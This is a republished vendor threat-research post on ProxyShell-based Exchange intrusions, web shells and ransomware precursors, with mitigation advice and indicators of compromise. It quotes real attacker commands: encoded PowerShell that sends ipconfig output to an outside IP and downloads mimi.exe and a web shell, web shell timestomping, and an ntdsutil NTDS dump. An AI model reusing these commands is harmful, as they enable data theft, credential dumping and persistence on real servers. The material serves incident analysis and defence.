11/17/2021 | News release | Distributed by Public on 11/17/2021 07:11
The Trend Trend Micro™ Managed XDR team recently observed a surge in server-side compromises - ProxyShell-related intrusions on Microsoft Exchange in particular via the Managed XDR service and other incident response engagements. These compromises, which occurred across different sectors in the Middle East, were most often observed in environments using on-premise implementations of Microsoft Exchange.
In the engagements where the attacker's objective was realized, we found that the deployment of ransomware was the most common end-goal for the attacks that occurred in the Middle East. This indicates that threat actor groups have begun to favor the use of exploits related to ProxyShell in order to establish initial access to an organization's system, with the possibility of ransomware attacks being launched down the line.
Using intrusion clusters that had overlaps in initial access techniques, we recently found a set of intrusions that were involved with attacks on the Middle East, which we will be dissecting in this blog entry. All of these intrusions, which share a commonality of exploiting vulnerable ProxyShell servers to gain an initial foothold on their target's network, were rooted from an IIS Worker Process that was spawning suspicious processes.
Through our observation of the web shell activity on the Trend Micro Vision One Platform and by analyzing the process tree created by the Internet Information Services (IIS) process w3wp.exe, we were able to determine the sequence of processes that are associated with the different attack phases and how they tied in to the threat actor's objective.
We clustered all the observed intrusions together to reveal some tactical and operational similarities between all the different ransomware affiliates that were deploying the final ransomware payloads. Through the Vision One platform, some intrusions were interrupted early in the infection chain, after which we compared these to other similar intrusions to determine the chain of events (and whetherLockFile,Conti, or any current active ransomware families in the Middle East threat landscape will be deployed as part of the routine).
In this blog entry, we will take a look at the ProxyShell vulnerabilities that were being exploited in these events, and dive deeper into the notable post-exploitation routines that were used in four separate incidents involving these web shell attacks.
The malicious actor initially tried to start the attack by scanning for dropped web shells, which we assume were dropped earlier via vulnerability exploitation. This part failed, as the files showed a 404 error code when we tried to access them.
The Autodiscover service is abused to leak a known user's distinguished name (DN), which is an address format used internally within Microsoft Exchange. The Messaging Application Programming Interface (MAPI) is then abused to leak the user's security identifier (SID).
This technique can be used by an attacker to impersonate a local administrator in order to run PowerShell commands.
The web shell is imported as mail inside theadministrator@xxxdraft mailbox. It is then exported to c:/inetpub/wwwroot/aspnet_client/puqjc.aspx, after which it is accessed and returned with 200 codes.
An analysis of the file system timeline shows the same - the puqjc.aspx file was created at the same time as the malicious web connection (2:00 PM UTC)
Upon analysis of the intrusion clusters, we were able to identify several variants of web shells used by different threat actors. The scanning and exploitation phases were the same in all the incidents, but the post-exploitation activities and their impact varied.
The following subsections go into the specifics of the post-exploitation routines we analyzed in four separate incidents that occurred in August and September 2021. While some of the incidents shared certain behaviors during infection, their post-exploitation routines varied.
In the first incident we handled, we discovered that the web shell employed in the attack usesexec_codequery parameter to execute ASP code. After successfully accessing the command-and-control (C&C) server, it executed commands to gather basic information on the compromised system.
Furthermore, the web shell also executed PowerShell commands, and downloaded and executed other malware.
It then executes a PowerShell-encoded base64 script that downloads another obfuscated PowerShell script, which it then executes. This script is part of the CobaltStrike malware familly which has the ability to provide backdoor access to infected machines.
We also noticed that the malicious actor behind the attack executed scripts to kill specific processes and to clear the PowerShell Windows events log.
Both servers are using Liferay CE version 6.2, which is vulnerable toCVE-2020-7961(possibly leading to remote code execution).
Our analysis shows that a Wget request was sent to a URL with a high numbered port. Unfortunately, we don't have information as to what was downloaded since the URL was already dead by the time of analysis.
"C:\Windows\System32\cmd.exe" /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK
The following commands were executed in order to gather basic system information:
The web shell was then copied and the original entry deleted using the following commands:
The ipconfig command was executed as an argument for a wget request.
The following code shows the Powershell-encoded (top) and decoded (bottom) commands:
"c:\windows\system32\cmd.exe" /c powershell.exe -exec bypass -enc JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQAMwA/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA
$r=ipconfig /all | out-string;wget -Uri http://91.92.136.250:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType "application/octet-stream"
"c:\windows\system32\cmd.exe" /c powershell -exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA5ADEALgA5ADIALgAxADMANgAuADIANQAwADoANAA0ADMALwBtAGkAbQBpAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXABtAGkAbQBpAC4AZQB4AGUAIgA=
Invoke-WebRequest -Uri "http://91.92.136.250:443/mimi.exe" -OutFile "c:\windows\temp\mimi.exe"
The web shell then downloaded an additional .aspx web shell and timestamped it to further disguised itself in the system, seen in the following code:
Invoke-WebRequest -Uri "http://91.92.136.250:443/out.aspx" -OutFile "c:\windows\temp\OutlookCM.aspx"
The web shell was then moved to the OWA directory with the following time stamp:
$f1=(Get-Item 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookCM.aspx'); $f2=(Get-Item 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookCN.aspx'); $f1.creationtime=$f2.creationtime; $f1.lastwritetime=$f2.lastwritetime; $f1.lastaccesstime=$f2.lastaccesstime;
After a few minutes, additional DLLs were created, which was later verified to be web shell files created either by w3wp.exe or UMWorkerProcess.exe.
In relation to this incident, we found the following malicious components and malware were used:
Other web shells
During our investigation into this cluster, we found a specific web shell variant written in C# within an ASP.net page, which is quite unusual since most web shells that we find are written in PHP instead. This is similar to thebespoke web shellthe KRYPTON group utilized in their campaigns. The DLL web shell also had a corresponding ASPX version of it in the same system.The Windows utility PsExec was detected during the lateral movement phase. The attacker used it to access remote machines and servers in order to drop and execute a new backdoor malware.
Apass-the-hash attack techniquewas used to access remote servers and machines, after which a new malware component was dropped in order to create persistence.
The following malware were dropped on the infected machines:
"C:\Windows\system32\cmd[.]exe" /c ntdsutil "activate instance ntds" ifm "create full c:\windows\temp\ntd" quit quit
While mitigation controls, such as the implementation of a host-based or network-based intrusion prevention system (HIPS/NIPS), can be applied to these severs, it should be noted that these controls would only buy time before any actual patching should occur, providing leeway for IT teams to allow them to trigger the appropriate change management controls.
It is also worthwhile to note that a Microsoft Exchange server would still have an active web shell even if it's patched after a successful compromise. This means that servers that have been compromised via vulnerabilities related to ProxyShell should be inspected thoroughly for any malicious activities since web shells may already exist (and could continue to still be operational). An active web shell can still allow a malicious actor to continue pursuing their chosen objectives such as ransomware infection, cryptocurrency mining, and data exfiltration.
The implementation of proper segmentation for publicly-exposed servers should always be reviewed, with their behavior (i.e., processes being launched, anti-malware violations, or network traffic profile) being monitored constantly. For example, the observation of internal network scanning, SMB traffic, or other unusual traffic that has not been seen historically can be a sign that the server has been compromised. Earlier this year,Microsoft wrote an excellent guidefor hardening web servers against web shell-based attacks.
Trend Micro Managed XDRoffers expert threat monitoring, correlation, and analysis from experienced cybersecurity industry veterans, providing 24/7 service that allows organizations to have one single source of detection, analysis, and response. This service is enhanced by solutions that combine AI and Trend Micro's wealth of global threat intelligence.
Product Name
|
Detections
|
Endpoint Security products:
Real Time scan Behavior monitoring |
|
Endpoint Security:
Deep Security IPS: |
|
Network Security:
TippingPoint |
|
Network Security: DDI Deep Discovery Inspector
|
|
Indicators of Compromise
Hashes
SHA256
|
Details
|
Detection Name
|
428D445BA0354CFE78485A50B52B04A949259D32CA939FCE151AA3DD3F352066
|
rundll.bat
|
HackTool.BAT.WinDefKiller.C
|
28356225C68A84A45C603C5E2EA91A1B2B457DB6F056D82B210CA7853F5CD2F8
|
CacheTask.dll
|
Backdoor.Win32.COTX.A
|
E3EAC25C3BEB77FFED609C53B447A81EC8A0E20FB94A6442A51D72CA9E6F7CD2
|
dllhost.exe
|
PUA.Win64.LanGO.B
|
27CB14B58F35A4E3E13903D3237C28BB386D5A56FEA88CDA16CE01CBF0E5AD8E
|
HostDLL.exe
|
Trojan.Win64.OGNHOST
|
5154E76030A08795D22B6CB51F6EA735C3C662409286F21A29B4037231F47043
|
Trojan.PS1.COBEACON.SMYXAK-A
|
IPs & URL
Strings(IIS Logs)
Vulnerabilities